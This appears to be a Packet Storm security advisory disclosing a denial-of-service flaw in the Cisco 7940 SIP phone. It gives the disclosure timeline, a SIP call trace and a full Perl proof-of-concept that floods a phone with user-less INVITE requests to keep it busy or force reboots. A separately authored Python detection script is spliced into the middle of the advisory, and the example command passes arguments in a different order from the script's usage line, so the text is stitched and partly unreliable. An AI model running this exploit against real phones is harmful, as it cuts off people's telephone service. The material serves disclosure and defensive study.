cisco7940-dos.txt

2007-12-06T00:00:00
ID PACKETSTORM:61522
Type packetstorm
Reporter Radu State
Modified 2007-12-06T00:00:00

Description

                                        
                                            `Cisco 7940 Denial of Service Vulnerability  
  
  
  
Hardware:  
  
Cisco 7940 SIP Phone  
  
  
  
Severity:  
  
High – Denial of Service  
  
  
  
Software:  
  
Affected version: P0S3-08-7-00  
  
Other Versions: Possibly affected
  
  
  
Notification:  
  
Vulnerability found: 30 August 2007  
  
Contact Cisco: 31 August 2007  
  
Tracked issue: 11 September 2007  
  
  
  
Vulnerability Synopsis:  
  
  
  
Initiating a sequence of SIP INVITE transactions leads the device to a state
where it looks functional but is unable to receive or to start calls.
If the sequence of INVITEs continues, the device will reboot. In the first
case, the period during which the device is exposed to a DoS is about 3
minutes, but sending new INVITE transactions at certain intervals will
keep the target under DoS.
  
  
  
To generate the SIP INVITE transactions that lead the device to this
state, the Request-URI of the message must not contain a user name (i.e.
"INVITE sip:XXX.XXX.XXX.XXX SIP/2.0"). Only 6 transactions are required to
drive the device into a DoS state, as the traffic displayed below shows.
  
  
  
X ----------------------- INVITE (Call-ID #1) -----------------------> Cisco 7940

X <------------------ 100 Trying (Call-ID #1) --------------------- Cisco 7940

....

-------- 5 new dialogs like the previous --------

....

X ----------------------- INVITE (Call-ID #7) -----------------------> Cisco 7940

X <------------------ 486 Busy (Call-ID #7) --------------------- Cisco 7940



-------- DoS for approximately 3 minutes --------



X <------------------ 486 Busy (Call-ID #1) --------------------- Cisco 7940

X <------------------ 486 Busy (Call-ID #2) --------------------- Cisco 7940

X <------------------ 486 Busy (Call-ID #3) --------------------- Cisco 7940

X <------------------ 486 Busy (Call-ID #4) --------------------- Cisco 7940

X <------------------ 486 Busy (Call-ID #5) --------------------- Cisco 7940

X <------------------ 486 Busy (Call-ID #6) --------------------- Cisco 7940
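The Request-URI shape and the six-dialog count described above, turned into a network-side detection check. This is an added example from the defender's side, not code from the advisory or the Madynes team: it parses SIP request lines from constructed sample packets, flags INVITEs whose Request-URI carries no user part, and counts distinct Call-IDs per source against the threshold the advisory gives. Function names, the RFC 5737 sample addresses and the packet list are assumptions.

```python
import re
from collections import defaultdict

# Six user-less INVITE dialogs are what the advisory says puts the 7940 into
# its busy state; alert once a single source has opened that many.
DIALOG_THRESHOLD = 6

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<uri>\S+) SIP/2\.0\r?$")
CALL_ID = re.compile(r"^(?:Call-ID|i):\s*(?P<cid>.+?)\s*$", re.I | re.M)

def uri_has_user(uri):
    """True if a sip:/sips: URI has a user part ('@' inside userinfo@hostport)."""
    if not uri.lower().startswith(("sip:", "sips:")):
        return False
    hostport = uri.split(":", 1)[1]
    # drop uri-parameters and headers, which may legitimately contain '@'
    hostport = hostport.split(";", 1)[0].split("?", 1)[0]
    return "@" in hostport

def parse_request(raw):
    """Return (method, request_uri, call_id) for a SIP request, else None."""
    m = REQUEST_LINE.match(raw.split("\n", 1)[0])
    if not m:
        return None
    cid = CALL_ID.search(raw)
    return m.group("method"), m.group("uri"), (cid.group("cid") if cid else None)

def find_userless_invite_floods(packets, threshold=DIALOG_THRESHOLD):
    """packets: iterable of (src_ip, raw_sip_text). Returns {src: dialogs}
    for sources whose user-less INVITEs span >= threshold distinct Call-IDs."""
    dialogs = defaultdict(set)
    for src, raw in packets:
        parsed = parse_request(raw)
        if parsed is None:
            continue
        method, uri, cid = parsed
        if method == "INVITE" and cid and not uri_has_user(uri):
            dialogs[src].add(cid)
    return {src: len(c) for src, c in dialogs.items() if len(c) >= threshold}

def _invite(uri, call_id):
    # Constructed sample INVITE (not captured traffic); hosts are RFC 5737 addresses.
    return ("INVITE %s SIP/2.0\r\nVia: SIP/2.0/UDP 192.0.2.10;branch=z9hG4bKabc\r\n"
            "Call-ID: %s\r\nCSeq: 1 INVITE\r\nContent-Length: 0\r\n\r\n" % (uri, call_id))

# Constructed: seven host-only INVITEs from one source, one normal call from another.
SAMPLE_PACKETS = [("192.0.2.10", _invite("sip:192.0.2.20", "c%d@192.0.2.10" % i)) for i in range(7)]
SAMPLE_PACKETS.append(("192.0.2.30", _invite("sip:alice@192.0.2.20", "ok1@192.0.2.30")))
```

Run over a live capture the same logic would key on the phone's IP as the Request-URI host; a source exceeding the threshold within a few seconds matches the pattern in the trace above.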
  
  
  
Effect:  
  
If the sequence of INVITE transactions continues, the device reboots.

Otherwise, the device can be permanently kept under DoS by sending INVITE
transactions at certain intervals.

In this state the device replies busy to any incoming call and returns busy
for any call placed by the user.

However, the device keeps its registration with its registrar, since it
continues to send REGISTER transactions.
  
  
  
Impact:  
  
Knowing the user ID and IP address of the target:

A remote user can crash the phone.

A DoS can be performed by sending the packets at regular intervals.
  
  
  
Proof of Concept:  
  
A Perl script (stateful-cisco-8.7.pl) is attached to this mail.
  
  
  
Command:  
  
perl stateful-cisco-8.7.pl <username> <dst_IP> <SourceIp> <sourceport>

Eg.
perl stateful-cisco-8.7.pl 192.168.1.7 7940-1 192.168.1.2 tucu
  
  
  
Credits:  
  
Humberto J. Abdelnur (Ph.D Student)  
  
Radu State (Ph.D)  
  
Olivier Festor (Ph.D)  
  
  
  
This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using KiF, the Madynes VoIP fuzzer.

http://madynes.loria.fr/
  
  
  
  
  
#!/usr/bin/perl

###############################
# Vulnerability discovered using KiF ~ Kiph
#
# Authors:
# Humberto J. Abdelnur (Ph.D Student)
# Radu State (Ph.D)
# Olivier Festor (Ph.D)
#
# Madynes Team, LORIA - INRIA Lorraine
# http://madynes.loria.fr
###############################

use IO::Socket::INET;
use String::Random;

die "Usage $0 <targetIP> <targetUser> <attackerIP> <attackerUser>"
    unless ($ARGV[3]);

$targetUser = $ARGV[1];
$targetIP = $ARGV[0];

$attackerUser = $ARGV[3];
$attackerIP= $ARGV[2];

$socket=new IO::Socket::INET->new(
    Proto=>'udp',
    PeerPort=>5060,
    PeerAddr=>$targetIP,
    LocalPort=>5060);

$foo = new String::Random;

$flag = 0;
@calls;
$threads = 0;

while ($flag == 0){
    $callid= " " . $foo->randpattern("CCCnccnC") ."\@$attackerIP";
    $cseq = $foo->randregex('\d\d\d\d');

    $msg = "INVITE sip:$targetIP SIP/2.0\r
Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
From: <sip:$attackerUser\@$attackerIP>;tag=1\r
To: <sip:$targetUser\@$targetIP>\r
Call-ID:$callid\r
CSeq: $cseq INVITE\r
Max-Forwards: 70\r
Contact: <sip:$attackerUser\@$attackerIP>\r
Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY, MESSAGE\r
Content-Length: 0\r
\r
";
    $socket->send($msg);

    $socket->recv($text,1024,0);
    if ($text =~ /^SIP\/2.0 100(.\r\n)*/ ){
        push(@calls, $callid);
        sleep(1);
    }elsif ($text =~ /^SIP\/2.0 486(.\r\n)*/ ){
        if ($thread == 0){
            $thread = scalar(@calls);
        }
        while (scalar(@calls) ge $thread){
            $toTag = $cseq= $callid= $text;
            $toTag =~ s/^(.*\r\n)*(To|t):(.*?>)(;.*?)?\r\n(.*\r\n)*/\4/;
            $callid =~ s/^(.*\r\n)*Call-ID:(.*)\r\n(.*\r\n)*/\2/;
            $cseq =~ s/^(.*\r\n)*CSeq: (.*?) (.*?)\r\n(.*\r\n)*/\2/;

            $msg = "ACK sip:$targetIP SIP/2.0\r
Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
From: <sip:$attackerUser\@$attackerIP>;tag=1\r
To: <sip:$targetUser\@$targetIP>$toTag\r
Call-ID:$callid\r
CSeq: $cseq ACK\r
Contact: <sip:$attackerUser\@$attackerIP>\r
Content-Length: 0\r
\r
";
            $socket->send($msg);
            $i= 0;
            while ($i < scalar(@calls)){
                if (@calls[$i] eq $callid){
                    delete @calls[$i];
                }else{
                    $i += 1;
                }
            }
            if (scalar(@calls) ge $thread){
                $socket->recv($text,1024,0);
            }
        }
    }
}
  
  
  
  